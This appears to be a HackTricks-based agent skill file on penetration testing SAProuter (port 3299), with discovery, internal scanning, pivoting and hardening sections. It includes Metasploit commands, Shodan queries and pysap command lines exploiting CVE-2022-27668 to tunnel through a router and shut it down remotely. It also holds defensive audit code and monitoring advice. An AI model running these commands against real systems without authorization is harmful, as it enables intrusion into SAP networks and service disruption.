Hacktricks-skills saprouter-pentest

How to pentest SAProuter (port 3299) for security assessments. Use this skill whenever the user mentions SAProuter, port 3299, SAP network penetration, SAP service discovery, or needs to enumerate/exploit SAP infrastructure. This skill covers Metasploit modules, CVE-2022-27668 exploitation, Nmap fingerprinting, and hardening recommendations. Make sure to use this skill for any SAP-related penetration testing, even if the user doesn't explicitly mention 'SAProuter' but describes SAP network access or port 3299 scanning.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/3299-pentesting-saprouter/SKILL.MD

SAProuter Penetration Testing

A comprehensive guide for security professionals to assess SAProuter security, enumerate internal networks, and identify vulnerabilities in SAP infrastructure.

When to Use This Skill

Use this skill when:

  • You need to scan or enumerate SAProuter services (port 3299)
  • You're conducting a penetration test on SAP infrastructure
  • You need to check for CVE-2022-27668 or similar SAProuter vulnerabilities
  • You want to pivot through SAProuter to access internal networks
  • You need to harden or audit SAProuter configurations
  • You're investigating exposed SAP services on the internet

Quick Start

# Check if SAProuter is running on target
nmap -p 3299 --script=banner <target-ip>

# Or use Metasploit discovery module
msfconsole -q -x "use auxiliary/scanner/sap/sap_service_discovery; set RHOSTS <target>; run"

Phase 1: Discovery and Fingerprinting

Step 1: Confirm SAProuter Presence

First, verify that port 3299 is open and identify the service:

# Basic port scan
nmap -p 3299 <target-ip>

# Banner grabbing
nmap -p 3299 --script=banner <target-ip>

# Custom SAProuter probe (add to nmap scripts)
nmap -p 3299 --script=sap-router-info <target-ip>

Expected output:

PORT     STATE SERVICE    VERSION
3299/tcp open  saprouter? SAProuter 7.22 on 'hostname'

Step 2: Metasploit Service Discovery

Use the sap_service_discovery module to confirm SAProuter presence:

msfconsole
use auxiliary/scanner/sap/sap_service_discovery
set RHOSTS <target-ip>
set RPORT 3299
run

What this does:

  • Sends SAP-specific probes to identify the service
  • Confirms if the target is actually running SAProuter
  • Helps distinguish from other services on port 3299

Step 3: Gather Router Information

Extract configuration details using sap_router_info_request:

use auxiliary/scanner/sap/sap_router_info_request
set RHOSTS <target-ip>
set RPORT 3299
run

Information revealed:

  • Router hostname
  • SAProuter version
  • Potential internal network details
  • Connection path information

Phase 2: Internal Network Enumeration

Step 1: Port Scanning Through SAProuter

Use sap_router_portscanner to discover internal services:

use auxiliary/scanner/sap/sap_router_portscanner
set RHOSTS <target-ip>
set RPORT 3299
set INSTANCES 00-50          # SAP instance range
set PORTS 32NN               # SAP standard ports (3200-3299)
run

Advanced scanning options:

# Scan specific ports
set PORTS 80,443,3299

# TCP mode for ACL mapping
set MODE TCP

# Target specific SAP systems
set PATHS /HOST:3299/SYS:3201

Step 2: ACL Mapping

Understand what connections are allowed or blocked:

use auxiliary/scanner/sap/sap_router_portscanner
set MODE TCP
set PORTS 80,32NN,443
set RHOSTS <target-ip>
run

What to look for:

  • Which internal hosts are reachable
  • Which ports are accessible
  • ACL restrictions and patterns
  • Potential pivot points

Step 3: Blind Host Enumeration

When direct information is limited, enumerate internal hostnames:

# Use common SAP hostname patterns
set PATHS /HOST:3299/SYS:3201
# Try: PRD, DEV, QAS, TEST, DMO, etc.

Common SAP system names to try:

  • PRD (Production)
  • DEV (Development)
  • QAS (Quality Assurance)
  • TEST (Testing)
  • DMO (Development Master)
  • HANA (SAP HANA database)

Phase 3: Exploitation and Pivoting

CVE-2022-27668 Exploitation

Critical vulnerability affecting SAProuter kernels ≥ 7.22 (CVSS 9.8).

Prerequisites:

  • Target running vulnerable SAProuter version
  • Permissive saprouttab entries (wildcards)
  • Access to port 3299

Exploitation steps:

# 1. Build loopback tunnel through vulnerable SAProuter
python router_portfw.py -d <ROUTER_IP> -p 3299 \
                        -t 0.0.0.0    -r 3299 \
                        -a 127.0.0.1  -l 3299 -v

# 2. Send admin packet (stop the remote router)
python router_admin.py -s -d 127.0.0.1 -p 3299

# 3. Other admin commands available:
#    - trace-level (debug information)
#    - connection-kill (terminate connections)
#    - shutdown (stop service)

Affected versions:

  • Stand-alone SAProuter 7.22 / 7.53
  • Kernel 7.49, 7.77, 7.81, 7.85–7.88

Mitigation:

  • Apply SAP Note 3158375
  • Remove wildcard entries from saprouttab
  • Start the router without the -X option
  • Don't expose directly to internet

Pivoting Through SAProuter

Use Metasploit's proxy capabilities to access internal services:

# Set up proxy through SAProuter
set Proxies sapni:<router-ip>:3299
set RHOSTS <internal-ip>

# Example: Enumerate internal SAP hosts
use auxiliary/scanner/sap/sap_hostctrl_getcomputersystem
set Proxies sapni:1.2.3.101:3299
set RHOSTS 192.168.1.18
run

Proxy types:

  • sapni: SAP Network Interface proxy
  • socks4: SOCKS4 proxy
  • socks5: SOCKS5 proxy

Phase 4: Advanced Techniques

Using pysap Framework

The pysap framework provides powerful tools for SAProuter testing:

# Install pysap
pip install pysap

# Available tools:
# router_portfw.py - Port forwarding/tunneling
# router_admin.py - Admin packet crafting
# router_trace.py - Trace level manipulation

Nmap Custom Probes

Add custom SAProuter detection to Nmap:

Probe TCP SAProuter q|\x00\x00\x00\x00|
ports 3299
match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/

Shodan Queries

Find exposed SAProuter instances:

port:3299 !HTTP Network packet too big
port:3299 SAProuter

Hardening Recommendations

Immediate Actions

  1. Firewall Configuration

    • Filter port 3299/TCP on perimeter firewall
    • Allow traffic only from trusted SAP support networks
    • Implement IP whitelisting
  2. Patch Management

    • Keep SAProuter fully patched
    • Verify with saprouter -v
    • Compare against latest kernel patch level
  3. Configuration Hardening

    • Use strict, host-specific entries in saprouttab
    • Avoid * wildcards in P/S rules
    • Deny rules targeting arbitrary hosts/ports
  4. Service Hardening

    • Start with -S <secudir> and SNC for encryption
    • Disable remote administration (-X)
    • Bind the listener to 127.0.0.1 if possible
    • Use external reverse proxy for required traffic
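As an added example (not part of the HackTricks skill or of SAP's tooling), a small Python auditor that reads a saprouttab and flags the wildcard P/S entries named in the CVE-2022-27668 prerequisites and in the configuration-hardening items above; the sample table is constructed, and the first-match top-to-bottom evaluation and the documented line format are assumptions.

```python
"""Audit a saprouttab for the permissive entries the hardening section warns about.
Added example, not from the HackTricks skill or SAP's tooling. Assumes the documented
line format '<P|S|D|KP|KS|KD> <source> <dest-host> <dest-service> [password]', '#'
comments, and first-match evaluation from top to bottom."""
from dataclasses import dataclass

# Constructed sample (not from a real system): the wildcard permit rule that the
# CVE-2022-27668 prerequisites describe, beside host-specific replacements.
SAMPLE_SAPROUTTAB = """\
P * * *                               # any source to any host and port
S 10.0.0.0/8 sapprd01 3200            # SAP protocols only, explicit host/port
P 192.168.10.5 sapdev01 3201          # one admin workstation, one instance
KP sapsupport.example 10.10.1.20 3200 # SNC-protected support connection
D * * *                               # explicit catch-all deny, last entry
"""
PERMIT_TYPES = {"P", "S", "KP", "KS"}
DENY_TYPES = {"D", "KD"}

@dataclass
class Finding:
    line_no: int   # 0 for table-wide findings
    rule: str
    severity: str  # "high", "medium" or "info"
    issue: str

def audit_saprouttab(text):
    """Return Findings for one saprouttab, in file order."""
    findings, deny_all_seen = [], False
    for n, raw in enumerate(text.splitlines(), 1):
        rule = raw.split("#", 1)[0].strip()
        if not rule:
            continue
        fields = rule.split()
        if len(fields) < 4 or fields[0].upper() not in PERMIT_TYPES | DENY_TYPES:
            findings.append(Finding(n, rule, "medium", "malformed or unknown entry"))
            continue
        rtype, src, dst, svc = fields[0].upper(), *fields[1:4]
        if rtype in DENY_TYPES:
            deny_all_seen = deny_all_seen or (src, dst, svc) == ("*", "*", "*")
            continue
        if deny_all_seen:  # first match wins, so this permit can never apply
            findings.append(Finding(n, rule, "info", "unreachable: a 'D * * *' entry precedes it"))
        wild = [k for k, v in (("source", src), ("destination", dst), ("service", svc)) if v == "*"]
        if wild:
            # Any-destination/any-service P rules let the router be pointed back at itself; S is milder.
            sev = "high" if rtype in ("P", "KP") and wild != ["source"] else "medium"
            findings.append(Finding(n, rule, sev, "wildcard " + ", ".join(wild) + " in permit rule"))
    if not deny_all_seen:
        findings.append(Finding(0, "", "info", "no explicit 'D * * *' catch-all as the last entry"))
    return findings
```

Run it against the real saprouttab on a router host; a clean result is no findings other than informational ones.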

Monitoring

Monitor the dev_rout log for:

  • Suspicious ROUTER_ADM packets
  • Unexpected NI_ROUTE requests to 0.0.0.0
  • Failed connection attempts
  • Unusual traffic patterns

Common Metasploit Modules

Module                          Purpose                    Command
sap_service_discovery           Initial service detection  use auxiliary/scanner/sap/sap_service_discovery
sap_router_info_request         Extract router info        use auxiliary/scanner/sap/sap_router_info_request
sap_router_portscanner          Internal port scanning     use auxiliary/scanner/sap/sap_router_portscanner
sap_hostctrl_getcomputersystem  Host enumeration           use auxiliary/scanner/sap/sap_hostctrl_getcomputersystem

Troubleshooting

Connection Issues

# Check if port is actually open
telnet <target> 3299
nc -zv <target> 3299

# Verify SAProuter is responding
nmap -p 3299 --script=banner <target>

Module Errors

# Ensure Metasploit has SAP modules
search sap

# Check module compatibility
info auxiliary/scanner/sap/sap_service_discovery

References

Legal Disclaimer

This skill is for authorized security assessments only. Always obtain proper authorization before testing any systems. Unauthorized access to computer systems is illegal and may result in criminal charges.